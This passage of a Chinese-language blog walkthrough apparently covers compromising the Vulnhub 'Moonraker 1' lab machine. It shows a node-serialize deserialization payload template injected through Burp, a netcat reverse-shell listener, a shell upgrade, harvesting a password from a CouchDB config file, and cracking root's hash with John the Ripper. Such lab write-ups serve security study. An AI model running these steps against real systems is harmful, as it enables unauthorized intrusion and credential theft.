<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> y = &#123;</span><br><span class="line">rce : <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;这里放生成的反序列化payload+;&#125; <span class="comment">//这个;不能少</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">var</span> serialize = <span class="built_in">require</span>(<span class="string">'node-serialize'</span>);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"Serialized: \n"</span> + serialize.serialize(y));</span><br></pre></td></tr></table></figure>

<p>执行结果如下。<br><img src="26.png" alt="26"></p>
<p>现在我们有了序列化的payload，把payload拿去base64加密。<br><img src="27.png" alt="27"></p>
<p>记得加密前要在图中画圈的位置加一对()，加了弹shell函数才会执行。然后在<code>192.168.183.143:3000</code>页面刷新，burp抓包，然后把base64加密后的payload填到profile那里。<br><img src="28.png" alt="28"></p>
<p>然后在kali监听端口<code>nc -lvnp 1234</code>，然后回到burp点Go，shell就弹到kali了。<br><img src="29.png" alt="29"></p>
<p>收到shell，我们首先使用<code>python3 -c&#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39;</code>命令把shell变成交互式的，方便我们操作。然后我们首先去<code>/home</code>目录看看有没有什么用户信息。<br><img src="30.png" alt="30"></p>
<p>有四个用户，都进去看看，没有什么有用的信息。想想这个靶机用的是couchdb数据库，我们就去看看它的配置文件<code>/etc/couchdb</code>。<br><img src="31.png" alt="31"></p>
<p>提示我们文件被移到<code>opt/couchdb/etc</code>目录了，那我们去那个目录下面看看。<br><img src="32.png" alt="32"></p>
<p><code>default.ini</code>我们没有权限，看看<code>local.ini</code>配置文件。<br><img src="33.png" alt="33"></p>
<p>看红框的内容，我们得到了hugo账户的密码。切换到hugo，然后使用<code>sudo -l</code>看看能不能有更高的权限。<br><img src="34.png" alt="34"></p>
<p>系统提示，hugo不能执行sudo命令，这条路走不通，我们只能想其他办法提权。接着搜索其它目录，在<code>var/mail</code>发现有hugo的邮件，打开看看。<br><img src="35.png" alt="35"></p>
<p>告诉了我们root旧密码的hash，并且告诉了我们root新密码是旧密码+“VR00M”，那我们把root密码的hash存到一个空文件，命名hash，然后使用kali的John the Ripper password cracker（约翰开膛手密码破解）工具爆破root的旧密码<code>john hash</code>。<br><img src="36.png" alt="36"></p>
<p>成功获得root的旧密码<code>cyber</code>，所以root的新密码为<code>cyberVR00M</code>，切换成root，去拿flag。<br><img src="37.png" alt="37"></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>warm glow
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://warm-glow.fun/2020/03/13/Moonraker-1%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/" title="Moonraker 1靶机渗透">https://warm-glow.fun/2020/03/13/Moonraker-1靶机渗透/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC8="><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"><i class="fa fa-tag"></i> 渗透测试</a>
              <a href="/tags/vulnhub/" rel="tag"><i class="fa fa-tag"></i> vulnhub</a>
              <a href="/tags/Moonraker/" rel="tag"><i class="fa fa-tag"></i> Moonraker</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/03/11/HA-Armour-%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/" rel="prev" title="HA-Armour 靶机渗透">
      <i class="fa fa-chevron-left"></i> HA-Armour 靶机渗透
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/03/16/sqli-labs%E9%9D%B6%E5%9C%BA/" rel="next" title="sqli-labs靶场">
      sqli-labs靶场 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#靶机信息："><span class="nav-text">- 靶机信息：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#渗透流程："><span class="nav-text">- 渗透流程：</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="warm glow"
      src="/images/kirito.jpg">
  <p class="site-author-name" itemprop="name">warm glow</p>
  <div class="site-description" itemprop="description">如夜空般将世界温柔地覆盖</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3dhcm0tZ2xvdw==" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;warm-glow"><i class="fa fa-fw fa-github"></i>GitHub</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOndhcm1fZ2xvd0AxNjMuY29t" title="E-Mail → mailto:warm_glow@163.com"><i class="fa fa-fw fa-envelope"></i>E-Mail</span>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">warm glow</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/canvas_lines.min.js"></script>


  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
